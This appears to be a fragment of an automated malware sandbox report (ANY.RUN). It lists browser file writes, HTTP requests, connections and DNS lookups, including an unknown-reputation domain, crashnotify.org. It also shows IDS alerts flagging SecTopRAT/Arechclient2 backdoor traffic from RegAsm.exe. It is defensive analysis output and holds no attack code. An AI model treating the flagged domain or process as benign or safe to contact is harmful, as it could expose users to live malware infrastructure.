2976  msedge.exe  C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RF18cdf9.TMP
MD5:
SHA256:
2976  msedge.exe  C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old
MD5:
SHA256:
2976  msedge.exe  C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RF18ce09.TMP
MD5:
SHA256:
2976  msedge.exe  C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
45
TCP/UDP connections
139
DNS requests
146
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2112
msedge.exe
GET
200
150.171.28.11:80
http://edge.microsoft.com/browsernetworktime/time/1/current?cup2key=2:6MEnVZ9U3rppIne7SM5hhzqpOxlTV1hapBRoOja8Gzk&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
unknown
whitelisted
5328
SearchApp.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
7276
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7276
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5328
SearchApp.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
8056
svchost.exe
HEAD
200
199.232.214.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/bf8090eb-6e5c-4c51-9250-5bf9b46cf160?P1=1753191227&P2=404&P3=2&P4=K%2bCXE%2f4Q1Lb0e%2bPcnMNyq5fSQzfazp6FI3R1AplCKvIwIpdcurLr9Q2%2bS7n04Aa%2fFCon3FGD6nAMi9jwZJE5oA%3d%3d
unknown
whitelisted
8056
svchost.exe
GET
206
199.232.214.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/bf8090eb-6e5c-4c51-9250-5bf9b46cf160?P1=1753191227&P2=404&P3=2&P4=K%2bCXE%2f4Q1Lb0e%2bPcnMNyq5fSQzfazp6FI3R1AplCKvIwIpdcurLr9Q2%2bS7n04Aa%2fFCon3FGD6nAMi9jwZJE5oA%3d%3d
unknown
whitelisted
7704
wscript.exe
GET
200
142.250.186.99:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
7704
wscript.exe
GET
200
172.64.149.23:80
http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEDlyRDr5IrdR19NsEN0xNZU%3D
unknown
whitelisted
7704
wscript.exe
GET
200
104.18.38.233:80
http://ocsp.sectigo.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRDC9IOTxN6GmyRjyTl2n4yTUczyAQUjYxexFStiuF36Zv5mwXhuAGNYeECEDIJNp8i8WsBCf5KFrBaGFM%3D
unknown
whitelisted

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
1268
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5944
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3888
RUXIMICS.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
2112
msedge.exe
13.107.42.16:443
config.edge.skype.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
2112
msedge.exe
150.171.28.11:80
edge.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
2112
msedge.exe
92.123.104.45:443
copilot.microsoft.com
Akamai International B.V.
DE
whitelisted
2112
msedge.exe
104.21.32.1:443
www.crashnotify.org
CLOUDFLARENET
unknown
2112
msedge.exe
150.171.28.11:443
edge.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 20.73.194.208
  • 51.104.136.2
whitelisted
google.com
  • 142.250.186.46
whitelisted
edge.microsoft.com
  • 150.171.28.11
  • 150.171.27.11
whitelisted
config.edge.skype.com
  • 13.107.42.16
whitelisted
www.crashnotify.org
  • 104.21.32.1
  • 104.21.16.1
  • 104.21.64.1
  • 104.21.80.1
  • 104.21.96.1
  • 104.21.112.1
  • 104.21.48.1
unknown
copilot.microsoft.com
  • 92.123.104.45
  • 92.123.104.53
whitelisted
www.bing.com
  • 92.123.104.61
  • 92.123.104.53
  • 92.123.104.22
  • 92.123.104.18
  • 92.123.104.59
  • 92.123.104.26
  • 92.123.104.19
  • 92.123.104.30
  • 92.123.104.52
  • 2.16.241.218
  • 2.16.241.205
  • 2.16.241.201
  • 92.123.104.43
  • 92.123.104.32
  • 92.123.104.49
  • 92.123.104.33
  • 92.123.104.47
  • 92.123.104.67
  • 92.123.104.65
  • 92.123.104.8
whitelisted
update.googleapis.com
  • 142.250.185.227
whitelisted
edgeassetservice.azureedge.net
  • 40.90.65.144
whitelisted
www.googleapis.com
  • 142.250.185.138
  • 142.250.186.42
  • 142.250.181.234
  • 216.58.206.74
  • 142.250.186.138
  • 142.250.185.106
  • 142.250.185.234
  • 216.58.212.170
  • 142.250.185.74
  • 142.250.186.170
  • 142.250.186.106
  • 172.217.16.202
  • 142.250.185.170
  • 142.250.185.202
  • 142.250.186.74
  • 172.217.18.10
whitelisted

Threats

PID
Process
Class
Message
2112
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] Cloudflare Network Error Logging (NEL)
2112
msedge.exe
Not Suspicious Traffic
INFO [ANY.RUN] Cloudflare Network Error Logging (NEL)
684
RegAsm.exe
A Network Trojan was detected
ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)
684
RegAsm.exe
A Network Trojan was detected
ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M3 (GET)
Process
Message
chrome.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\Temp\pfnlqlzu.nne directory exists )
chrome.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\Temp\fpq12l01.1om directory exists )
chrome.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\Temp\n3flgi0v.tx5 directory exists )
chrome.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\Temp\yuigr3xy.qdz directory exists )
chrome.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\Temp\cfo4bcd2.dsm directory exists )
chrome.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\Temp\itlrd3ge.b4c directory exists )
msedge.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\Temp\tegw23i4.j3b directory exists )
msedge.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\Temp\lrpr13co.5jo directory exists )
msedge.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\Temp\cycea4ts.twt directory exists )
msedge.exe
RecursiveDirectoryCreate( C:\Users\admin\AppData\Local\Temp\nno5ults.yg4 directory exists )